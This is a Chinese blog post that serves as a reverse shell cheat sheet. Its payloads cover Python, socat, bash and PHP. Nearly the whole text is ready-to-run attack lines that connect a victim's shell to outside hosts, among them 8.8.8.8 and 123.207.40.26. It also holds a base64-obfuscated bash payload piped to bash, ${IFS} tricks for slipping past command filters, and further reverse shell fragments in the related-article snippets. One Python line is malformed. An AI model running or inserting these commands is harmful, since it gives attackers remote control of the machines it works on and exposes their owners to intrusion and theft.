各种语言反弹shell (持续更新)

作者: 王一航 | 来源:发表于2017-07-14 17:36 被阅读160次

python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("8.8.8.8",44 );os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

socat

这个应该是功能最全的反弹shell了
并不是一个伪终端 , 可以在其中使用 vim , ssh -D 等等工具
但是如果目标机器没有安装 socat , 可能需要从源码编译一遍
socat file:`tty`,raw,echo=0 tcp-listen:8888
socat tcp-connect:8.8.8.8:8888 exec:’bash -li’,pty,stderr,setsid,sigint,sane

bash

/bin/bash -c 'sh -i >& /dev/tcp/8.8.8.8/4444 0>&1'
/bin/bash -c 'sh -i >& /dev/tcp/123.207.40.26/8888 0>&1'
echo "L2Jpbi9iYXNoIC1jICdzaCAtaSA+JiAvZGV2L3RjcC8xMjMuMjA3LjQwLjI2Lzg4ODggMD4mMSc="|base64 -d|bash

ls${IFS}/var/www/html|head${IFS}-n${IFS}1
ls${IFS}/var/www/html/9ef89ad913e848b64b73e3aa721e44e4|head${IFS}-n${IFS}1

php

# 1. 利用 exec 函数
<?php exec('/bin/bash -c "bash -i >& /dev/tcp/8.8.8.8/4444 0>&1"');?>
# 2. 在 P神 的博客里面翻出来的 , 原理类似 , 都是使用流的重定向
php -r '$sock=fsockopen($ip, $port);exec("/bin/sh -i <&3 >&3 2>&3");'
# 3. 再来膜一发 P神
$sock = fsockopen($ip, $port);
$descriptorspec = array(
        0 => $sock,
        1 => $sock,
        2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);

参考资料 :

Program execution Functions

相关文章

  • 各种语言反弹shell (持续更新)

    python socat bash php 参考资料 : Program execution Functions

  • shell常用命令

    shell既是一种命令语言,又是一种程序设计语言,是用户使用Linux 的桥梁随着深入学习,此篇文章持续更新......

  • 【安全记录】反弹shell小记

    前言 本文记录反弹shell的一些注意事项,主要包括:常用反弹shell的payload,获得tty-shell,...

  • nc自启动

    例如开机自启cmd 自启nc反弹shell(一) 自启nc反弹shell(二)

  • 各种干货(持续更新)

    生活篇 1.无法确定自己是否饿了? 问一下自己是否需要一个苹果。如果答案是“不”,那么你不是饿了,而是无聊了。 2...

  • shell编程100例—学习

    持续更新中,今年要好好学习shell呀。原文章连接:shell编程100例[https://blog.csdn.n...

  • kail工具介绍

    反弹Shell https://www.cnblogs.com/cocowool/p/reverse-shell....

  • Linux与shell 持续更新

    一、cp 高效用法 第一行中是 cp 命令和具体的参数(-r 是“递归”, -u 是“更新”,-v 是“详细”)这...

  • 反弹shell

    Reverse Shell bash反弹服务端: bash -c 'sh -i &>/dev/tcp/210.28...

  • 反弹shell

    bash -i 操作 攻击机 192.168.188.140执行 nc -lvvp 8888监听本地8888端口 ...

网友评论

    本文标题:各种语言反弹shell (持续更新)

    本文链接:https://www.haomeiwen.com/subject/yllohxtx.html